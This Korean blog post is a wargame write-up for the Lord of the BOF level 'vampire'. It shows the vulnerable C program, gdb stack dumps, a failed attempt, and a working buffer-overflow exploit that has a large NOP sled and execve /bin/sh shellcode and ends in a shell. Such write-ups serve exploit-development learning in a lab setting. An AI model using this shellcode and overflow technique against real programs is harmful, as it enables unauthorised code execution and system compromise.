이번 문제는 레벨 8에 비해 굉장히 쉽게풀렷네요 8이 고비였나봅니다
소스를 보면
[troll@localhost troll]$ cat vampire.c
/*
The Lord of the BOF : The Fellowship of the BOF
- vampire
- check 0xbfff
*/
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
char buffer[40];
if(argc < 2){
printf("argv error\n");
exit(0);
}
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
// here is changed!
if(argv[1][46] == '\xff')
{
printf("but it's not forever\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
굵은 부분으로 표시한 부분이 추가 되었습니다 따라서 주소가
bf(이부분은 위에 추가된 부분)ff(새롭게 추가된부분)----
이렇게된다면 ff 에서 걸리기 때문에 커맨드가 씹히게 됩니다
처음 시도하려 했던 방법은 RTL 이였는데
$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
$1 = {<text variable, no debug info>} 0x400a9d48 <__execve>
주소가 이렇게 되기 떄문에 bf-------- 부분에서 걸리기때문에 사용할수 없었고,
심볼릭 링크 ,버퍼에도 못넣음,환경 변수 같은경우는 --ff---- 부분에서 걸리기때문에 사용할수 없었습니다
마지막으로 생각해본 방법인 argv[2]를 이빠이 넣어서 시작 주소를 줄이는 방법이였는데,
이방법이 먹혔습니다
우선 /tmp 부분으로 복사를 한후 디버깅하여 실행해보았는데
[troll@localhost /tmp]$ gcc -o vampire vampire.c
ls s^H[troll@localhost /tmp]$ gdb -q vampire
(gdb) b main
Breakpoint 1 at 0x8048436
(gdb) r $(perl -e 'print "\x90"x44,"\xbf\xbf\xbf\xbf"') $(perl -e 'print "\x90"x80000,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"')
Starting program: /tmp/vampire $(perl -e 'print "\x90"x44,"\xbf\xbf\xbf\xbf"') $(perl -e 'print "\x90"x80000,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"')
Breakpoint 1, 0x8048436 in main ()
(gdb) x/80000x $esp
0xbffec230: 0xbffec258 0x4000a970 0x400f855b 0x08049584
0xbffec240: 0x4000ae60 0xbffec2a4 0xbffec258 0x0804841b
0xbffec250: 0x08049570 0x08049584 0xbffec278 0x400309cb
0xbffec260: 0x00000003 0xbffec2a4 0xbffec2b4 0x40013868
0xbffec270: 0x00000003 0x08048380 0x00000000 0x080483a1
0xbffec280: 0x08048430 0x00000003 0xbffec2a4 0x080482e0
0xbffec290: 0x080484fc 0x4000ae60 0xbffec29c 0x40013e90
0xbffec2a0: 0x00000003 0xbffec39d 0xbffec3aa 0xbffec3db
0xbffec2b0: 0x00000000 0xbffffc74 0xbffffc7d 0xbffffc95
0xbffec2c0: 0xbffffcb4 0xbffffcd6 0xbffffce1 0xbffffea4
0xbffec2d0: 0xbffffec3 0xbffffede 0xbffffef3 0xbfffff10
0xbffec2e0: 0xbfffff1b 0xbfffff34 0xbfffff42 0xbfffff4a
0xbffec2f0: 0xbfffff5b 0xbfffff65 0xbfffff73 0xbfffff84
0xbffec300: 0xbfffff92 0xbfffff9d 0xbfffffae 0x00000000
0xbffec310: 0x00000003 0x08048034 0x00000004 0x00000020
0xbffec320: 0x00000005 0x00000006 0x00000006 0x00001000
0xbffec330: 0x00000007 0x40000000 0x00000008 0x00000000
0xbffec340: 0x00000009 0x08048380 0x0000000b 0x000001fc
0xbffec350: 0x0000000c 0x000001fc 0x0000000d 0x000001fc
0xbffec360: 0x0000000e 0x000001fc 0x00000010 0x0fabfbff
0xbffec370: 0x0000000f 0xbffec398 0x00000000 0x00000000
0xbffec380: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffec390: 0x00000000 0x00000000 0x36383669 0x6d742f00
0xbffec3a0: 0x61762f70 0x7269706d 0x90900065 0x90909090
0xbffec3b0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffec3c0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffec3d0: 0x90909090 0xbfbf9090 0x9000bfbf 0x90909090
0xbffec3e0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffec3f0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffec400: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffec410: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffec420: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffec430: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffec440: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffec450: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffec460: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffec470: 0x90909090 0x90909090 0x90909090 0x90909090
...(썰매를 엄청나게 넣어서 뒷부분은 생략하였습니다)
굵은 부분으로 표시한 부분전후로 argv[1] argv[2] 가됩니다 따라서 뒷부분의 임의의 주소를 넣어주게된다면
[troll@localhost troll]$ ./vampire $(perl -e 'print "\xbf"x44,"\xe0\xc3\xfe\xbf"') $(perl -e 'print "\x90"x80000,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"')
옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜煽
bash$ my-pass
euid = 509
music world
bash$
이렇게 쉘이 따집니다
c.f <오류가 낫엇던 페이로드>
왠지는 모르겟는데 argv[1] 앞부분에 썰매를 44 때려넣엇는데 안되서 /xbf로 바꿔넣엇더니 됫습니다
[troll@localhost troll]$ ./vampire $(perl -e 'print "\x90"x44","\xe0\xc3\xfe\xbf"') $(perl -e 'print "\x90"x80000,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"')
String found where operator expected at -e line 1, near "44",""
(Missing operator before ","?)
syntax error at -e line 1, near "44",""
Backslash found where operator expected at -e line 1, near "","\"
(Missing operator before \?)
Backslash found where operator expected at -e line 1, near "xe0\"
Backslash found where operator expected at -e line 1, near "xc3\"
Backslash found where operator expected at -e line 1, near "xfe\"
String found where operator expected at -e line 1, at end of line
(Missing semicolon on previous line?)
Can't find string terminator '"' anywhere before EOF at -e line 1.
stack is still your friend.
'과거의 컴퓨터 공부 > LOB(完)' 카테고리의 다른 글
| (LOB)Level11.skeleton (0) | 2014.08.16 |
|---|---|
| (LOB)Level10.vampire (0) | 2014.08.14 |
| (LOB)Level8.orge (0) | 2014.08.14 |
| (LOB)level7.darkelf (0) | 2014.08.11 |
| (LOB)Level6.wolfman (0) | 2014.08.11 |